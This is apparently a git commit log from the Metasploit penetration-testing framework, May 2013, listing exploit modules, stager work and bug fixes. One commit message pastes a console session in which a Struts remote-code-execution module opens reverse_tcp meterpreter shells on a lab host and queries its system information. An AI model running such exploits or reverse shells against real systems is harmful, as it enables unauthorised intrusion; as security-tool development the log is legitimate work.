Console
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
Console
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
Console
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
Console
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
Console
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
Roberto Soares Espreto
07203568bd
Performed changes to the correct operation of the module.
2013-05-29 20:50:28 -03:00
jvazquez-r7
07c99f821e
Land #1879, @dcbz ARM stagers
2013-05-29 17:43:37 -05:00
Tod Beardsley
fff51e2e0c
Land #1882, fix for CVE search from @jlee-r7
2013-05-29 17:00:32 -05:00
James Lee
12f0448bb4
Use a LIKE test instead of equality
...
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match
[SeeRM #7989]
2013-05-29 16:27:33 -05:00
jvazquez-r7
f76a50ae38
Land #1881, @todb's fix for Redmine Bug 7991
2013-05-29 16:17:18 -05:00
Tod Beardsley
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
dcbz
8b8fb9f5ae
Merge pull request #1 from jvazquez-r7/arm_stagers
...
ARM stagers cleanup
2013-05-29 13:07:46 -07:00
jvazquez-r7
7c41e239b4
Fix author name
2013-05-29 14:19:10 -05:00
jvazquez-r7
e6433fc31e
Add commented source code for stagers and stage
2013-05-29 14:03:46 -05:00
jvazquez-r7
52aae8e04c
Add small fixes for stagers
2013-05-29 14:01:59 -05:00
Tod Beardsley
10d8bebe73
Start with a random username to test 401 codes
...
SeeRM #7991
While this fixes the specific case of tomcat_mgr_login, it doesn't
address the general case where modules are attempting to test code 401
responses in order to determine if bruteforcing should continue.
2013-05-29 12:36:28 -05:00
Samuel Huckins
f0e3b0c124
Merge pull request #1836 from dmaloney-r7/bug/anyuser_anypass_http
...
Verified MSF specs passing, Pro on develop functional tests working (ran Bruteforce, saw normal and verbose output concerning that bruteforce was skipped for such a case and why, verified no cred saved with 'anyuser' user).
2013-05-29 07:44:18 -07:00
Console
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
Console
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
dcbz
2c0f0f5f04
Changed reverse payload as suggested.
2013-05-28 21:52:16 -05:00
dcbz
07c3565e3c
Made changes as suggested, forgot to remove exit() after testing was complete.
2013-05-28 21:31:36 -05:00
jvazquez-r7
146284cdd5
Land #1876, @wchen-r7's fix for Redmine 7984
2013-05-28 20:05:50 -05:00
sinn3r
ed5b8895bb
Fixes smart_migrate for a TypeError bug
...
Bug is: TypeError can't convert Rex::RuntimeError into String
[SeeRM: #7984]
2013-05-28 18:45:49 -05:00
sinn3r
63694a6c87
Landing #1875 - Also remove *.ts.rb files
2013-05-28 17:29:02 -05:00
Console
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
Tod Beardsley
14c4dbcf8c
Also remove *.ts.rb files
...
On the heels of #1862, this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
jvazquez-r7
a486fff9a4
Land #1872, @wchen-r7's improvement of cold_fusion_version
2013-05-28 16:35:45 -05:00
jvazquez-r7
96888455a7
Add new signature for CF9
2013-05-28 16:04:08 -05:00
James Lee
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
James Lee
0466cce7b1
Move PostMixin to its own file
...
Also replaces dead code in lib/msf/core/exploit/local.rb with what was
actually being used for the Exploit::Local class that lived in
lib/msf/core/exploit.rb.
2013-05-28 15:46:06 -05:00
sinn3r
8cb1bdefb7
Landing #1849 - 32 and 64bit compatible to_winpe_only() function
2013-05-28 15:24:43 -05:00
sinn3r
deea66b76f
Landing #1871 - fix an undefined variable bug in the DTP module
2013-05-28 15:13:20 -05:00
sinn3r
085b943107
Landing #1873 - mdm version bump
2013-05-28 15:03:39 -05:00
David Maloney
5b4c26146c
mdm version bump
2013-05-28 14:59:38 -05:00
sinn3r
b9969a8b2b
Landing #1855 - Updates for coldfusion_pwd_props for CF9 by ringt
2013-05-28 14:43:09 -05:00
sinn3r
0ecffea66f
Updates fingerprint() for CF10
2013-05-28 14:42:11 -05:00
sinn3r
a6a46f82bb
Updates the description a little bit
2013-05-28 14:31:56 -05:00
sinn3r
e4e5edc619
Looks like we don't need to check MD5, let's keep it that way then.
2013-05-28 14:31:15 -05:00
sinn3r
8ab90e657c
Adds a check for Cold Fusion 10
2013-05-28 14:21:29 -05:00
Samuel Huckins
e20385dd9e
Merge pull request #1864 from dmaloney-r7/feature/task_associations/cred_service_host
...
Passes specs and functional tests
2013-05-28 12:11:57 -07:00
Spencer McIntyre
3857507d73
fix an undefined variable bug in the DTP module
2013-05-28 14:52:58 -04:00
Console
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r
d16d316658
Fixes mssql_findandsampledata & ms11_006_createsizeddibsection
...
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r
73aa14cb91
Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946)
2013-05-28 11:02:21 -05:00
Tod Beardsley
2861b70a34
Add a note about hooking msftidy
2013-05-28 10:44:23 -05:00
Tod Beardsley
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00